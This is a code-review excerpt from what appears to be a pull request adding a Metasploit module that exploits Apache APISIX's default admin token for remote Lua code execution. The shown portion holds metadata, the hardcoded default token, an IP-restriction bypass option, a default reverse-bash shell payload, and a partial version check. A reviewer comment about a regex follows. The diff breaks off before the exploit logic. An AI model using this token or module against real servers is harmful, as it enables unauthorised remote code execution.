modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb

```diff
@@ -0,0 +1,226 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'APISIX Admin API default access token RCE',
+        'Description' => %q{
+          Apache APISIX has a default built-in API token edd1c9f034335f136f87ad84b625c8f1
+          that can be used to access all the admin API, which leads to the
+          remote LUA code execution through the script parameter added in the 2.x version.
+          This module also leverages the another vulnerability to bypass the IP restriction
+          plugin.
+        },
+        'Author' => [
+          'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging
+          'YuanSheng Wang <membphis[at]gmail.com>' # discovered
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2020-13945'],
+          ['CVE', '2022-24112'],
+          ['URL', 'https://github.com/apache/apisix/pull/2244'],
+          ['URL', 'https://seclists.org/oss-sec/2020/q4/187'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2022/02/11/3']
+        ],
+        'DisclosureDate' => '2020-12-07',
+        'Arch' => ARCH_CMD,
+        'Platform' => %w[unix],
+        'Targets' => [
+          [
+            'Automatic',
+            { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the APISIX DocumentRoot', '/apisix']),
+      OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1']),
+      OptString.new('ALLOWED_IP', [true, 'IP in the allowed list', '127.0.0.1'])
+    ])
+  end
+
+  def check
+    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    # perform an unautheticated request to a random path
+    res = send_request_cgi({
+      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(6)), # random path
+      'method' => 'GET'
+    })
+
+    unless res && res.headers.key?('Server')
+      return Exploit::CheckCode::Safe('Seems not a APISIX server')
+    end
+
+    res.headers['Server'].match(%r{APISIX/(.*)$})
+    version = Rex::Version.new(Regexp.last_match(1))
+    vprint_status("Found an APISIX #{version}")
```

Comment:
This needs to check if the regex matched otherwise there'll be a problem because the version won't be available.